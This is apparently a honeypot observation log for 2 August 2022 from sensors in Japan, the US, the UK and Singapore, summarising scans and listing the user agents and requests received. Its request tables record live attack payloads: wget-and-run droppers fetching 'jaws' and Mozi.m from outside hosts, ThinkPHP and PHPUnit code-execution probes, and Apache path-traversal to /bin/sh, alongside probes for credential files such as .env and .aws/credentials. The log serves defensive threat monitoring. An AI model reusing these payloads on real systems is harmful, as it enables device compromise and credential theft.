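Honeypot (tentative) observation log for 2022/08/02.
Highlights
Common to all locations
Access targeting the Apache HTTP Server vulnerability (CVE-2021-41773)
Access targeting GPON router vulnerabilities
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting ThinkPHP vulnerabilities
Scanning by zgrab
Scanning for /.env
Scanning for Apache Solr
Scanning for Laravel
Location:JP
Scanning by curl
Scanning for .css
Scanning for .js
Scanning for /.aws
Scanning for /.git
The above were observed.
The following access to /shell was observed:
cd /tmp; rm -rf *; wget rischyo.cf/jaws; sh /tmp/jaws
Location:US
Access targeting D-Link product vulnerabilities
Access targeting NetGear product vulnerabilities
Scanning for /.git
Scanning for Apache Tomcat
Gh0stRAT-like behavior
The above were observed.
Location:UK
Access targeting D-Link product vulnerabilities
Access targeting NetGear product vulnerabilities
Scanning for /.aws
Scanning for Apache Tomcat
Scanning for phpMyAdmin
The above were observed.
Location:SG
Access targeting D-Link product vulnerabilities
Scanning for /.aws
Scanning for /.git
Scanning for Apache Tomcat
Scanning for phpMyAdmin
The above were observed.
Other
Access count trend
JP: total accesses: 226 (change from previous day: 139)
US: total accesses: 80 (change from previous day: 3)
UK: total accesses: 43 (change from previous day: -15)
SG: total accesses: 70 (change from previous day: 5)
For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.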
Location:JP
Source IP address list
UserAgent list
Count | UserAgent |
---|---|
15 | - |
4 | Go-http-client/1.1 |
6 | Mozila/5.0 |
4 | Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) |
1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36 |
37 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
11 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
15 | curl/7.54.0 |
118 | python-requests/2.28.1 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | | |
1 | MGLNDD_18.179.20.5_80\n | | |
2 | \x16\x03\x01\x01D\x01 | | |
6 | \x16\x03\x01\x02 | | |
3 | \x16\x03\x01 | | |
1 | CONNECT | kyfw[.]12306[.]cn:443 | HTTP/1.0 |
1 | GET | /.env.bak | HTTP/1.1 |
1 | GET | /.env.save | HTTP/1.1 |
38 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/HEAD | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | //.aws/credentials | HTTP/1.1 |
1 | GET | //.env.bak | HTTP/1.1 |
1 | GET | //.git/config | HTTP/1.1 |
1 | GET | //_profiler/phpinfo/info.php | HTTP/1.1 |
1 | GET | //_profiler/phpinfo/phpinfo.php | HTTP/1.1 |
1 | GET | //_profiler/phpinfo | HTTP/1.1 |
1 | GET | // | HTTP/1.1 |
1 | GET | //access/info.php | HTTP/1.1 |
1 | GET | //access/infophp.php | HTTP/1.1 |
1 | GET | //access/phpinfo.php | HTTP/1.1 |
1 | GET | //access/phpinfo | HTTP/1.1 |
1 | GET | //account/info.php | HTTP/1.1 |
1 | GET | //account/infophp.php | HTTP/1.1 |
1 | GET | //account/phpinfo.php | HTTP/1.1 |
1 | GET | //account/phpinfo | HTTP/1.1 |
1 | GET | //admin/info.php | HTTP/1.1 |
1 | GET | //admin/infophp.php | HTTP/1.1 |
1 | GET | //admin/phpinfo.html | HTTP/1.1 |
1 | GET | //admin/phpinfo.php | HTTP/1.1 |
1 | GET | //admin/phpinfo | HTTP/1.1 |
1 | GET | //admin_php[.]php/infophp.php | HTTP/1.1 |
1 | GET | //apache/i.php | HTTP/1.1 |
1 | GET | //apache/info.php | HTTP/1.1 |
1 | GET | //apache/phpinfo.php | HTTP/1.1 |
1 | GET | //apache2[.]php | HTTP/1.1 |
1 | GET | //apache[.]php | HTTP/1.1 |
1 | GET | //aws[.]yml | HTTP/1.1 |
1 | GET | //backend/.env | HTTP/1.1 |
1 | GET | //config[.]js | HTTP/1.1 |
1 | GET | //console/info.php | HTTP/1.1 |
1 | GET | //console/infophp | HTTP/1.1 |
1 | GET | //console/phpinfo.html | HTTP/1.1 |
1 | GET | //console/phpinfo.php | HTTP/1.1 |
1 | GET | //console/phpinfo | HTTP/1.1 |
1 | GET | //dashboard/i.php | HTTP/1.1 |
1 | GET | //dashboard/info.php | HTTP/1.1 |
1 | GET | //dashboard/infophp.php | HTTP/1.1 |
2 | GET | //dashboard/phpinfo.php | HTTP/1.1 |
1 | GET | //dashboard/phpinfo | HTTP/1.1 |
1 | GET | //dashboard/test.php | HTTP/1.1 |
1 | GET | //debug/default/view?panel=config | HTTP/1.1 |
1 | GET | //dep[.]php | HTTP/1.1 |
1 | GET | //deploy[.]php | HTTP/1.1 |
1 | GET | //dev/.env | HTTP/1.1 |
2 | GET | //dev[.]php | HTTP/1.1 |
1 | GET | //developer[.]php | HTTP/1.1 |
1 | GET | //devs[.]php | HTTP/1.1 |
1 | GET | //env/info.php | HTTP/1.1 |
1 | GET | //env/infophp | HTTP/1.1 |
1 | GET | //env/phpinfo.php | HTTP/1.1 |
1 | GET | //env/phpinfo | HTTP/1.1 |
1 | GET | //environment/info.php | HTTP/1.1 |
1 | GET | //environment/infophp.php | HTTP/1.1 |
1 | GET | //environment/phpinfo.php | HTTP/1.1 |
1 | GET | //environment/phpinfo | HTTP/1.1 |
1 | GET | //frontend_dev[.]php/$ | HTTP/1.1 |
1 | GET | //i[.]php | HTTP/1.1 |
1 | GET | //in[.]php | HTTP/1.1 |
1 | GET | //index/info.php | HTTP/1.1 |
1 | GET | //index/infophp.php | HTTP/1.1 |
1 | GET | //index/phpinfo.php | HTTP/1.1 |
1 | GET | //index/phpinfo | HTTP/1.1 |
1 | GET | //index1[.]php | HTTP/1.1 |
1 | GET | //index[.]php | HTTP/1.1 |
1 | GET | //inf[.]php | HTTP/1.1 |
1 | GET | //info/info.php | HTTP/1.1 |
1 | GET | //info/infophp.php | HTTP/1.1 |
1 | GET | //info/phpinfo.php | HTTP/1.1 |
1 | GET | //info/phpinfo | HTTP/1.1 |
1 | GET | //info1[.]php | HTTP/1.1 |
1 | GET | //info2[.]php | HTTP/1.1 |
1 | GET | //info3[.]php | HTTP/1.1 |
1 | GET | //info4[.]php | HTTP/1.1 |
2 | GET | //info[.]php | HTTP/1.1 |
1 | GET | //infophp[.]php | HTTP/1.1 |
1 | GET | //infos[.]php | HTTP/1.1 |
1 | GET | //ini[.]php | HTTP/1.1 |
1 | GET | //live/.env | HTTP/1.1 |
1 | GET | //o[.]php | HTTP/1.1 |
1 | GET | //ocp[.]php | HTTP/1.1 |
1 | GET | //p[.]php | HTTP/1.1 |
1 | GET | //php-info.php | HTTP/1.1 |
1 | GET | //php/phpinfo.php | HTTP/1.1 |
1 | GET | //php1[.]php | HTTP/1.1 |
1 | GET | //php[.]php | HTTP/1.1 |
1 | GET | //php_info[.]php | HTTP/1.1 |
1 | GET | //phpinfo/info.php | HTTP/1.1 |
1 | GET | //phpinfo/phpinfo.php | HTTP/1.1 |
1 | GET | //phpinfo1[.]php | HTTP/1.1 |
1 | GET | //phpinfo2[.]php | HTTP/1.1 |
1 | GET | //phpinfo3[.]php | HTTP/1.1 |
1 | GET | //phpinfo4[.]php | HTTP/1.1 |
2 | GET | //phpinfo[.]html | HTTP/1.1 |
2 | GET | //phpinfo[.]php | HTTP/1.1 |
1 | GET | //phpinfo[.]txt | HTTP/1.1 |
1 | GET | //phpinfo | HTTP/1.1 |
1 | GET | //phpinfodev[.]php | HTTP/1.1 |
1 | GET | //phpinfos[.]php | HTTP/1.1 |
1 | GET | //phpsysinfo/info.php | HTTP/1.1 |
1 | GET | //phpsysinfo/phpinfo.php | HTTP/1.1 |
1 | GET | //phpsysinfo/phpsysinfo.php | HTTP/1.1 |
1 | GET | //phpsysinfo[.]php | HTTP/1.1 |
1 | GET | //phpsysinfo | HTTP/1.1 |
1 | GET | //phptest[.]php | HTTP/1.1 |
1 | GET | //pinfo[.]php | HTTP/1.1 |
1 | GET | //rest[.]php | HTTP/1.1 |
1 | GET | //root/info.php | HTTP/1.1 |
1 | GET | //root/infophp.php | HTTP/1.1 |
1 | GET | //root/phpinfo.html | HTTP/1.1 |
1 | GET | //root/phpinfo.php | HTTP/1.1 |
1 | GET | //root/phpinfo | HTTP/1.1 |
1 | GET | //staging/.env | HTTP/1.1 |
1 | GET | //test0[.]php | HTTP/1.1 |
1 | GET | //test1[.]php | HTTP/1.1 |
1 | GET | //test1 | HTTP/1.1 |
1 | GET | //test2[.]php | HTTP/1.1 |
1 | GET | //test3[.]php | HTTP/1.1 |
1 | GET | //test4[.]php | HTTP/1.1 |
1 | GET | //test[.]php | HTTP/1.1 |
1 | GET | //token[.]php | HTTP/1.1 |
1 | GET | //tools/info.php | HTTP/1.1 |
1 | GET | //tools/infophp.php | HTTP/1.1 |
1 | GET | //tools/phpinfo.php | HTTP/1.1 |
1 | GET | //tools/phpinfo | HTTP/1.1 |
1 | GET | //tz[.]php | HTTP/1.1 |
1 | GET | //web[.]php | HTTP/1.1 |
1 | GET | /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /?pp=env | HTTP/1.1 |
1 | GET | /CSS/Miniweb.css | HTTP/1.1 |
1 | GET | /JUVg | HTTP/1.1 |
1 | GET | /Portal/Portal.mwsl | HTTP/1.1 |
1 | GET | /Portal0000.htm | HTTP/1.1 |
1 | GET | /__Additional | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /_profiler/phpinfo | HTTP/1.1 |
1 | GET | /config.js | HTTP/1.1 |
1 | GET | /config.json | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /frontend_dev.php/$ | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /laravel/.env | HTTP/1.1 |
1 | GET | /localstart.jsa | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /nmaplowercheck1659295252 | HTTP/1.1 |
1 | GET | /pools/default/buckets | HTTP/1.1 |
1 | GET | /pools | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /server-status | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ rischyo.cf/jaws;sh+/tmp/jaws | |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | http[:]//example[.]com/ | HTTP/1.1 |
1 | OPTIONS | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /scripts/WPnBr.dll | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
Source IP address list
UserAgent list
Count | UserAgent |
---|---|
19 | - |
3 | Go-http-client/1.1 |
1 | Mozila/5.0 |
2 | Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 |
16 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
29 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | Gh0st\xad | | |
2 | \x03 | | |
1 | \x16\x03\x01\x01C\x01 | | |
2 | \x16\x03\x01\x01D\x01 | | |
2 | \x16\x03\x01 | | |
29 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | //prototype/.env | HTTP/1.1 |
1 | GET | //staging/.env | HTTP/1.1 |
1 | GET | /0bef | HTTP/1.0 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /HNAP1/ | HTTP/1.1 |
1 | GET | /ReportServer | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
2 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 | HTTP/1.0 |
2 | GET | /sitemap.xml | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | http[:]//dyn[.]epicgifs[.]net/test6956.php | HTTP/1.1 |
1 | OPTIONS | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
3 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
5 | PRI | * | HTTP/2.0 |
Location:UK
Source IP address list
UserAgent list
Count | UserAgent |
---|---|
16 | - |
3 | Go-http-client/1.1 |
1 | Mozila/5.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
6 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 zgrab/0.x |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_132.145.66.34_80\n | | |
2 | \x03 | | |
1 | \x16\x03\x01\x01C\x01 | | |
3 | \x16\x03\x01\x01D\x01 | | |
4 | \x16\x03\x01 | | |
1 | GET | /.aws/credentials | HTTP/1.1 |
6 | GET | /.env | HTTP/1.1 |
1 | GET | /0bef | HTTP/1.0 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /ReportServer | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /phpMyAdmin/index.php | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//114[.]228[.]35[.]186:51669/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 | HTTP/1.0 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | OPTIONS | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.1 |
3 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | PRI | * | HTTP/2.0 |
Location:SG
Source IP address list
UserAgent list
Count | UserAgent |
---|---|
17 | - |
4 | Go-http-client/1.1 |
1 | Mozila/5.0 |
4 | Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
1 | Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525 |
3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
23 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | | |
1 | MGLNDD_13.67.44.234_80 | | |
2 | \x03 | | |
2 | \x16\x03\x01\x01D\x01 | | |
4 | \x16\x03\x01 | | |
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 | X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
1 | CONNECT | kyfw[.]12306[.]cn:443 | HTTP/1.0 |
1 | GET | /.aws/credentials | HTTP/1.1 |
20 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | //backend/.env | HTTP/1.1 |
1 | GET | //dev/.env | HTTP/1.1 |
1 | GET | //live/.env | HTTP/1.1 |
1 | GET | //staging/.env | HTTP/1.1 |
1 | GET | /0bef | HTTP/1.0 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /blog/.env | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin | HTTP/1.0 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /laravel/.env | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /phpMyAdmin/index.php | HTTP/1.1 |
2 | GET | /phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /phpmyadmin4.8.5/index.php | HTTP/1.1 |
1 | GET | /pmd/index.php | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | http[:]//example[.]com/ | HTTP/1.1 |
1 | OPTIONS | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.1 |
4 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | PRI | * | HTTP/2.0 |